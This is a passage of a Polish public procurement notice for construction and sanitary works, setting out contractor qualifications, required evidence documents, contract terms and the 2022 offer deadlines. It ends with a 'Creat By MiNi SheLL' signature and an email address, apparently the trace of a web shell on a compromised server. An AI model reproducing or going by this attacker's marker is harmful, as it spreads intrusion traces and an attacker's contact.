specjalności drogowej.<br/>4.2.4. do sprawowania funkcji kierownika robót sanitarnych, posiadającego uprawnienia do pełnienia samodzielnych funkcji<br/>technicznych w budownictwie w zakresie kierowania robotami budowlanymi – bez ograniczeń – w specjalności instalacyjnej<br/>w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>Uwaga!<br/>1) W przypadku składania oferty przez Wykonawców występujących wspólnie, wykonaniem robót budowlanych/usług muszą<br/>wykazać się łącznie Wykonawcy występujący wspólnie.<br/>2) W przypadku składania oferty przez Wykonawców występujących wspólnie, dysponowaniem osobami posiadającymi<br/>kwalifikacje zawodowe lub doświadczenie muszą wykazać się łącznie Wykonawcy występujący wspólnie.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W ww. przypadku Wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty Oświadczenie (o którym mowa w art. 117 ust.4<br/>Ustawy), z którego wynika, które roboty budowlane/usługi, wykonają poszczególni wykonawcy.<br/>4) W związku z zastrzeżeniem przez Zamawiającego (w Rozdziale III pkt 11) osobistego wykonania zakresu przedmiotu<br/>zamówienia dotyczącego robót budowlanych, o których mowa w Rozdziale III pkt 2.2 SWZ, Wykonawca nie może polegać<br/>na zdolnościach podmiotów udostępniających zasoby w celu wykazania spełniania warunku udziału w postępowaniu, o<br/>którym mowa w pkt 4.1.2. SWZ. Wobec powyższego przedmiotowy warunek musi zostać spełniony przez<br/>Wykonawcę/Wykonawcę wspólnie ubiegającego się o zamówienie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykaz podmiotowych<br/>środków dowodowych (aktualnych na dzień ich złożenia) składanych na wezwanie zamawiającego przez Wykonawcę, którego oferta<br/>została najwyżej oceniona w celu niepodlegania wykluczeniu:<br/>1.1. Oświadczenie o braku przynależności do tej samej grupy kapitałowej (w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp) z innym<br/>wykonawcą, który złożył odrębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego to tej samej grupy kapitałowej<br/>(wg wzoru stanowiącego Załącznik Nr 5 do SWZ).<br/>Uwaga!<br/>W przypadku składania oferty przez Wykonawców występujących wspólnie, dokument, o którym mowa powyżej, musi złożyć każdy z<br/>Wykonawców występujących wspólnie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2.<br/>Wykaz podmiotowych środków dowodowych (aktualnych na dzień ich złożenia) składanych na wezwanie zamawiającego przez<br/>Wykonawcę, którego oferta została najwyżej oceniona w celu potwierdzenia spełniania warunków udziału w postępowaniu, o których<br/>mowa w art. 112 Ustawy.<br/>2.1. Wykaz usług, wykonanych w okresie ostatnich 3 lat (liczonych wstecz od dnia, w którym upływa termin składania ofert), a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów,<br/>na rzecz których usługi zostały wykonane (wzór stanowi Załącznik Nr 6 do SWZ) oraz załączeniem dowodów określających czy te<br/>usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego usługi zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie wykonawcy.<br/>Uwaga!<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi wykonawcami, wykaz o<br/>którym mowa powyżej dotyczy usług, w których wykonaniu wykonawca ten bezpośrednio uczestniczył (które zrealizował).<br/>2.2. Wykaz robót budowlanych, wykonanych nie wcześniej niż w okresie ostatnich 5 lat (liczonych wstecz od dnia, w którym upływa<br/>termin składania ofert), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości,<br/>daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór stanowi Załącznik Nr 7 do SWZ) oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Uwaga!<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami,<br/>wykaz, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył (które<br/>zrealizował).<br/>2.3. Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór stanowi Załącznik Nr 8 do<br/>SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający określił w SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Stosownie do postanowień art. 455 Ustawy, Zamawiający przewiduje możliwość dokonania<br/>zmian postanowień zawartej umowy w stosunku do treści oferty, wobec czego ww. zmiany oraz<br/>warunki tych zmian zostały określone w PPU <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na platformie zakupowej pod adresem: https://szrm.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-08 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com